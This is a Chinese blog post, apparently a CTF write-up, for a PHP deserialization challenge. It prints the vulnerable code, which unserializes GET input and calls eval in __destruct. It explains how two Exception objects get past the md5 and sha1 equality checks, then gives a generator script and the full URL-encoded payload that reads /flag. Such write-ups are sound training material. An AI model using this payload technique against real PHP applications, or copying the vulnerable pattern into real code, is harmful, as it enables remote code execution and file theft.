成理信安协会题目反序列化02

明面上看着不可能的题一般就预示着有空子可钻。

直接上源码###

 <?php
show_source(__FILE__);
class CDUTSEC
{
    public $var1;
    public $var2;

    function __construct($var1, $var2)
    {
        $var1 = $var1;
        $var2 = $var2;
    }

    function __destruct()
    {
        echo md5($this->var1);
        echo md5($this->var2);
        if (($this->var1 != $this->var2) && (md5($this->var1) === md5($this->var2)) && (sha1($this->var1) === sha1($this->var2))) {
            eval($this->var1);
        }
    }
}

unserialize($_GET['payload']);

代码审计###

一看,很好嘛,两个变量原值弱比较不同但md5与sha1编码后要求强比较相等。想到数组绕过,但是eval执行的需要是字符串,数组转为字符串后就只剩下:Array 了,显然数组绕过行不通,在加上这边同时使用了MD5 和 sha1 我们想要利用 fastcoll 来碰撞也不行了。怎么搞?
无内鬼,直接祭出大佬博客

利用 Exception类 绕过md5 sha1 等系列 https://mayi077.gitee.io/2020/08/14/%E5%88%A9%E7%94%A8-Exception%E7%B1%BB-%E7%BB%95%E8%BF%87md5-sha1-%E7%AD%89%E7%B3%BB%E5%88%97/

然后根据博客写出的脚本:###

<?php
class CDUTSEC
{
    public $var1;
    public $var2;

    // function __construct($a, $b)
    // {
    //     $var1 = $var1;
    //     $var2 = $var2;
    // }

    // function __destruct()
    // {
    //     echo md5($this->var1);
    //     echo md5($this->var2);
    //     if (($this->var1 != $this->var2) && (md5($this->var1) === md5($this->var2)) && (sha1($this->var1) === sha1($this->var2)))
    //     {                
    //         eval($this->var1);
    //     }
    // }
} 

$cmd="readfile('/flag');?>";
$a = new Exception($cmd);$b = new Exception($cmd,1);

$tr = new CDUTSEC();
$tr->var1=$a;
$tr->var2=$b;
echo urlencode(serialize($tr));

这里要urlencode的原因是直接序列化的字符串有些在文本下是乱码。url编码一下保证我们拿到的payload不丢失不出错。

另外,本题ban了几个常用的拿flag的函数,我们传入的命令在$cmd处修改,建议先传'phpinfo();?>',一来成不成功好分辨,二来看看有没有ban常用函数。

最后我们用readfile函数读到flag。

payload:O%3A7%3A%22CDUTSEC%22%3A2%3A%7Bs%3A4%3A%22var1%22%3BO%3A9%3A%22Exception%22%3A7%3A%7Bs%3A10%3A%22%00%2A%00message%22%3Bs%3A20%3A%22readfile%28%27%2Fflag%27%29%3B%3F%3E%22%3Bs%3A17%3A%22%00Exception%00string%22%3Bs%3A0%3A%22%22%3Bs%3A7%3A%22%00%2A%00code%22%3Bi%3A0%3Bs%3A7%3A%22%00%2A%00file%22%3Bs%3A48%3A%22D%3A%5Cphpstudy_pro%5CWWW%5CCTFphp%5C%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%A2%9802.php%22%3Bs%3A7%3A%22%00%2A%00line%22%3Bi%3A24%3Bs%3A16%3A%22%00Exception%00trace%22%3Ba%3A0%3A%7B%7Ds%3A19%3A%22%00Exception%00previous%22%3BN%3B%7Ds%3A4%3A%22var2%22%3BO%3A9%3A%22Exception%22%3A7%3A%7Bs%3A10%3A%22%00%2A%00message%22%3Bs%3A20%3A%22readfile%28%27%2Fflag%27%29%3B%3F%3E%22%3Bs%3A17%3A%22%00Exception%00string%22%3Bs%3A0%3A%22%22%3Bs%3A7%3A%22%00%2A%00code%22%3Bi%3A1%3Bs%3A7%3A%22%00%2A%00file%22%3Bs%3A48%3A%22D%3A%5Cphpstudy_pro%5CWWW%5CCTFphp%5C%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%A2%9802.php%22%3Bs%3A7%3A%22%00%2A%00line%22%3Bi%3A24%3Bs%3A16%3A%22%00Exception%00trace%22%3Ba%3A0%3A%7B%7Ds%3A19%3A%22%00Exception%00previous%22%3BN%3B%7D%7D

没啥好说的,刷的题中积累的小知识点而已。(笑)

posted @ 2020-10-07 15:50  Riv3r1and  阅读(517)  评论(0编辑  收藏  举报